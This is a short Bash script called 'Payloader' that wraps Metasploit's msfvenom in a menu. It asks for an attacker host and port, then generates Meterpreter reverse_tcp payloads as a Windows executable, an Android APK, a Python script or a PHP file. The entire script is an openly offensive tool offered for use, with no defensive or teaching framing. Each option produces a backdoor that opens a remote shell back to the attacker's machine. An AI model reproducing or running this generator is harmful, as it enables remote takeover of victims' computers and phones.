#!/bin/bash

ch=0
lh=0
lp=0

banner(){

echo "  
  ____             _                 _           
 |  _ \ __ _ _   _| | ___   __ _  __| | ___ _ __ 
 | |_) / _  | | | | |/ _ \ / _  |/ _  |/ _ \ '__|
 |  __/ (_| | |_| | | (_) | (_| | (_| |  __/ |   
 |_|   \__,_|\__, |_|\___/ \__,_|\__,_|\___|_|   
             |___/                             
 "


printf "\n"
echo -e "\e[41m         v1.0 Developed By Jay Vadhaiya         \e[0m"
printf "\n"

}

checkpkg(){

	if [ ! command -v msfconsole &> /dev/null ]
	then
		echo "Metasploit Is Not Inslled."
		printf "\n"
		exit
	fi	
}

menu(){

	echo "[1]" "Windows"
	echo "[2]" "Android"
	echo "[3]" "Python"
	echo "[4]" "PHP"
	echo "[5]" "Exit"
	printf "\n"
	echo "Choise :- "
	read ch

}

gethost(){
	clear
	banner
	echo "Enter LHOST For Payload :-"
	read lh
	printf "\n"
	echo "Enter LPORT For Payload :-"
	read lp

	clear
	banner

}

payloader(){

if [ $ch == 1 ]
then
	clear
	banner
	gethost
	echo "Creating Payload Please Wait..."
	msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lh  LPORT=$lp R > payloader_windows.exe

	clear
	banner
	echo "Playload Created Successfully"
	sleep 1
	clear
	banner
	menu
	payloader

elif [ $ch == 2 ]
then
        clear
        banner
	gethost
   	echo "Creating Payload Please Wait..."
	msfvenom -p android/meterpreter/reverse_tcp LHOST=$lh LPORT=$lp R > payloader_android.apk

	clear
	banner
	echo "Payload Created Successfully"
	sleep 1
	clear
	banner
	menu
	payloader

elif [ $ch == 3 ]
then
	clear
	banner
	gethost
	echo "Creating Payload Please Wait..."
	msfvenom -p python/meterpreter/reverse_tcp LHOST=$lh LPORT=$lp R > payloader_python.py

	clear
	banner
	echo "Payload Created Successfully"
	sleep 1
	clear
	banner
	menu
	payloader

elif [ $ch == 4 ]
then
	clear
	banner
	gethost
	echo "Creating Payload Please Wait..."
	msfvenom -p php/meterpreter/reverse_tcp LHOST=$lh LPORT=$lp R > payloader_php.php

	clear
	banner
	echo "Payload Created Successfully"
	sleep 1
	clear
	banner
	menu
	payloader

elif [ $ch == 5 ]
then
	clear
	banner
	echo "Thank You For Using This Tool."
	sleep 1
	exit

else
	clear
	banner
	echo "Invalid Option"
	sleep 1
	clear
	banner
	menu
	payloader

fi
}

clear
banner
checkpkg
menu

clear
payloader
